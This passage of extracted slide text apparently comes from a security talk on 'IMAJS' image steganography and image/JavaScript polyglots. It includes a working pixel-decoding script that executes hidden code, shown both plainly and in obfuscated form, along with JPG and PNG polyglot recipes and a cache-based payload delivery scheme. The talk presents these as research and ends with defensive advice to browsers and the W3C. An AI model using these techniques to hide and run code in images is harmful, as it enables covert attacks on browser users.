  • 23. NETSQUARE decode_pixels.js L=2,C=3,G=3,a=[],x=y=0,z=1<<L,I=parseInt,S=String.fromCharCode;window.onload= function(){P.onclick=function({V=document.createElement("canvas");k=P.parentNode; k.insertBefore(V,P);W=V.width=P.width;H=V.height=P.height;m=V.getContext("2d"); m.drawImage(P,0,0);k.removeChild(P);m=m.getImageData(0,0,W,H).data;c=function(p,x,y) {n=(y*W+x)*4;r=(p[n]&z)>>L;g=(p[n+1]&z)>>L;b=(p[n+2]&z)>>L;return S([r,g,b,r][C]+48)}; k=function(l){for(i=j=0;j<l*8;j++){a[i++]=c(m,x,y);x+=G;if(x>=W){x=0;y+=G}}};k(6); k(I(X(a)));try{CollectGarbage()}catch(e){}setTimeout(new Function(X(a)),99)}};function X(c){s="",d=c.join(s);for(i=0;i<d.length;i+=8)s+=S(I(d.substr(i,8),2));return s} $=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$) +"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"""+""+$.__$+$.__$+$.$__+"="+$._$_+","+$.__$+$.___+$._$$+"="+$._$$+","+ $.__$+$.___+$.$$$+"="+$._$$+","+$.$_$_+"=[],"+$.__$+$.$$$+$.___+"="+$.__$+$.$$$+$.__$+"="+$.___+","+$.__$+$.$$$+$._$_+"="+$.__$+"<<"+$.__$+$.__$+$.$__+","+$.__$+$.__$+$.__$+"="+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+ $.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$$_+$.__+","+$.__$+$._$_+$._$$+"="+$.__$+$._$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+"."+$.$$$$+""+$.__$+ $.$$_+$._$_+$._$+""+$.__$+$.$_$+$.$_$+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+""+$.__$+$.___+$._$$+$._$+$.$$_$+$.$$$_+";"+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+$.$$_$+$._$+" "+$.__$+$.$$_+$.$$$+"."+$._$+""+$.__$+$.$_$+$.$$_+(![]+"")[$._$_]+$._$+$.$_$_+$.$$_$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.___+"."+$._$+""+$.__$+$.$_$+$.$$_ +$.$$__+(![]+"")[$._$_]+""+$.__$+$.$_$+$.__$+$.$$__+""+$.__$+$.$_$+$._$$+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"(){"+$.__$+$._$_+$.$$_+"="+$.$$_$+$._$+$.$$__+$._+""+$.__$+$. $_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+""+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+""+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$_$+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+"(""+$.$$__+$.$_$_+""+$.__$+$. $_$+$.$$_+""+$.__$+$.$$_+$.$$_+$.$_$_+""+$.__$+$.$$_+$._$$+"");"+$.__$+$.$_$+$._$$+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.___+$.$_$_+""+$.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$$_+$.__+""+$.__$+$.__$+$.$$_+$._$+$.$$_$+$.$$ $_+";"+$.__$+$.$_$+$._$$+"."+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$$_+$._$$+$.$$$_+""+$.__$+$.$$_+$._$_+$.__+""+$.__$+$.___+$._$_+$.$$$_+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+$.$$$_+"("+$.__$+$._$_+$.$$_+","+$.__$+$._ $_+$.___+");"+$.__$+$._$_+$.$$$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+$.___+"="+$.__$+$._$_+$.___+"."+$.__$+$.$$_+$.$$$+""+$.__$+$.$_$+$.__$+$.$$_$+$.__+""+$.__$+$.$_$+ $.___+";"+$.__$+$.__$+$.___+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+$.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+"="+$.__$+$._$_+$.___+"."+$.__$+$.$_$+$.___+$.$$$_+""+$.__$+$.$_$+$.__$+""+ $.__$+$.$__+$.$$$+""+$.__$+$.$_$+$.___+$.__+";"+$.__$+$.$_$+$.$_$+"="+$.__$+$._$_+$.$$_+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.___+$._$$+$._$+""+$.__$+$.$_$+$.$$_+$.__+$.$$$_+""+$.__$+$.$$$+$.___+$.__+"(""+$._$_+$.$$_$+" ");"+$.__$+$.$_$+$.$_$+"."+$.$$_$+""+$.__$+$.$$_+$._$_+$.$_$_+""+$.__$+$.$$_+$.$$$+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"("+$.__$+$._$_+$.___+","+$.___+","+$.___+");"+$.__$+$.$_$+$._$$+"."+ $.__$+$.$$_+$._$_+$.$$$_+""+$.__$+$.$_$+$.$_$+$._$+""+$.__$+$.$$_+$.$$_+$.$$$_+""+$.__$+$.___+$._$$+""+$.__$+$.$_$+$.___+""+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.__$+$._$_+$.___+");"+$.__$+$.$_$+$.$_$+"="+$.__$+$.$_$+$.$_ $+"."+$.__$+$.$__+$.$$$+$.$$$_+$.__+""+$.__$+$.__$+$.__$+""+$.__$+$.$_$+$.$_$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+""+$.__$+$.___+$.$__+$.$_$_+$.__+$.$_$_+"("+$.___+","+$.___+","+$.__$+$._$_+$.$$$+","+$.__$+$.__$+$.___+")."+$.$$_$+ $.$_$_+$.__+$.$_$_+";"+$.$$__+"="+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$.___+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+"){"+$.__$+$.$_$+$.$$_+"=("+$.__$+$.$$ $+$.__$+"*"+$.__$+$._$_+$.$$$+"+"+$.__$+$.$$$+$.___+")*"+$.$__+";"+$.__$+$.$$_+$._$_+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$__+$.$$$+"=("+$.__$+$.$$_+$.___+"["+ $.__$+$.$_$+$.$$_+"+"+$.__$+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.$_$$+"=("+$.__$+$.$$_+$.___+"["+$.__$+$.$_$+$.$$_+"+"+$._$_+"]&"+$.__$+$.$$$+$._$_+")>>"+$.__$+$.__$+$.$__+";"+$.__$+$.$$_+$._$_+$.$$$_+$.__+$._+""+ $.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$_+$._$$+"(["+$.__$+$.$$_+$._$_+","+$.__$+$.$__+$.$$$+","+$.$_$$+","+$.__$+$.$$_+$._$_+"]["+$.__$+$.___+$._$$+"]+"+$.$__+$.$___+")};"+$.__$+$.$_$+$._$$+"="+$.$$$$+ $._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+(![]+"")[$._$_]+"){"+$.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.__$+$.$_$+$._$_+"="+$.___+";"+$.__$+$.$_$+$._$_+"<"+(![]+"")[$._$_] +"*"+$.$___+";"+$.__$+$.$_$+$._$_+"++){"+$.$_$_+"["+$.__$+$.$_$+$.__$+"++]="+$.$$__+"("+$.__$+$.$_$+$.$_$+","+$.__$+$.$$$+$.___+","+$.__$+$.$$$+$.__$+");"+$.__$+$.$$$+$.___+"+="+$.__$+$.___+$.$$$+";"+$.__$+$.$_$+$.__$+$.$$$$+"("+ $.__$+$._$_+$.$$$+"<"+$.__$+$.$$$+$.___+"){"+$.__$+$.$$$+$.___+"="+$.___+";"+$.__$+$.$$$+$.__$+"+="+$.__$+$.___+$.$$$+"}}};"+$.__$+$.$_$+$._$$+"("+$.$$_+");"+$.__$+$.$_$+$._$$+"("+$.__$+$.__$+$.__$+"("+$.__$+$._$$+$.___+"("+$.$_$_ +")));"+$.__+""+$.__$+$.$$_+$._$_+""+$.__$+$.$$$+$.__$+"{"+$.__$+$.___+$._$$+$._$+(![]+"")[$._$_]+(![]+"")[$._$_]+$.$$$_+$.$$__+$.__+""+$.__$+$.___+$.$$$+$.$_$_+""+$.__$+$.$$_+$._$_+$.$_$$+$.$_$_+""+$.__$+$.$__+$.$$$+$.$$$_+"()}"+$.$$__+ $.$_$_+$.__+$.$$__+""+$.__$+$.$_$+$.___+"("+$.$$$_+"){}"+$.__$+$.$$_+$._$$+$.$$$_+$.__+""+$.__$+$._$_+$.$__+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$_$+$.$$$_+$._$+$._+$.__+"("+$.__$+$.$_$+$.$$_+$.$$$_+""+$.__$+$.$$_+$.$$$+""+$. $__+$.___+""+$.__$+$.___+$.$$_+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$.$_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$._$$+$.___+"("+$.$_$_+")),"+$.$__$+$.$__$+")}};"+$.$$$$+$._+""+$.__$+$.$_$+$.$$_+$.$$__+$.__+""+$.__$+$. $_$+$.__$+$._$+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$._$$+$.___+"("+$.$$__+"){"+$.__$+$.$$_+$._$$+"="","+$.$$_$+"="+$.$$__+"."+$.__$+$.$_$+$._$_+$._$+""+$.__$+$.$_$+$.__$+""+$.__$+$.$_$+$.$$_+"("+$.__$+$.$$_+$._$$+");"+ $.$$$$+$._$+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+"="+$.___+";"+$.__$+$.$_$+$.__$+"<"+$.$$_$+"."+(![]+"")[$._$_]+$.$$$_+""+$.__$+$.$_$+$.$$_+""+$.__$+$.$__+$.$$$+$.__+""+$.__$+$.$_$+$.___+";"+$.__$+$.$_$+$.__$+"+="+$.$___+")"+ $.__$+$.$$_+$._$$+"+="+$.__$+$._$_+$._$$+"("+$.__$+$.__$+$.__$+"("+$.$$_$+"."+$.__$+$.$$_+$._$$+$._+$.$_$$+""+$.__$+$.$$_+$._$$+$.__+""+$.__$+$.$$_+$._$_+"("+$.__$+$.$_$+$.__$+","+$.$___+"),"+$._$_+"));"+$.__$+$.$$_+$._$_+$.$$$_+ $.__+$._+""+$.__$+$.$$_+$._$_+""+$.__$+$.$_$+$.$$_+""+$.$__+$.___+""+$.__$+$.$$_+$._$$+"}"+""")())();
  • 24. NETSQUARE Step 3. Images that ``Auto Run`` IMAJS STEGO- DECODER JAVASCRIPT POLYGLOT ENCODED IMAGE
  • 26. NETSQUARE IMAJS - Image+JS Polyglot Image Javascript Holy Sh** Bipolar Content! <img> sees pixels <script> sees code #YourPointOfView
  • 29. NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres DQT SOF0 DHT FF E0 U Yres H V FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Hu๏ฌ€man tables
  • 30. NETSQUARE IMAJS-JPG Recipe SOI FF D8 APP0 length J F I F 0 versn Xres FF E0 U Yres H V ... more random data ... <html random random random random... and other HTML stu๏ฌ€ goes here... random ><head random> decoder script <script type=text/undefined> ... DQT SOF0 DHT FF DB quantization tables DQT FF DB quantization tables FF C0 start of frame FF C4 Hu๏ฌ€man tables
  • 31. NETSQUARE IMAJS-PNG Recipe Inspiration: http://daeken.com/superpacking-js-demos PNG Header 89 50 4E 47 0D 0A 1A 0A IHDR IHDRlength chunk data CRC tEXtlength _00<html random random ... CRC random><head random> decoder script and other HTML stu๏ฌ€ goes here... <script type=text/undefined>... extra tEXt chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IDATlength pixel data CRCIDAT chunk IEND0 CRCIEND chunk
  • 32. NETSQUARE Step 4. The Finer Points of Package Delivery
  • 34. NETSQUARE Exploit code encoded in image. EVIL GET /lolcat.png 200 OK Expires: 6 months I'M IN UR BASE Decoder script references image from cache. SAFE GET /lolcat.png Load from cache ....KILLING UR DOODZ DEC 2015 APR 2016 < PAYLOADS GO back in time
  • 40. NETSQUARE Browsers and W3C - Wake Up! BROWSERS โ€ขโ€ฏ Don't be afraid to "BREAK THE WEB". โ€ขโ€ฏ Reject content that does not conform to strict standards/specs. W3C โ€ขโ€ฏ STRICT parsing rules โ€“ like COMPILERS. โ€ขโ€ฏ Browser compliance and user- awareness is YOUR responsibility.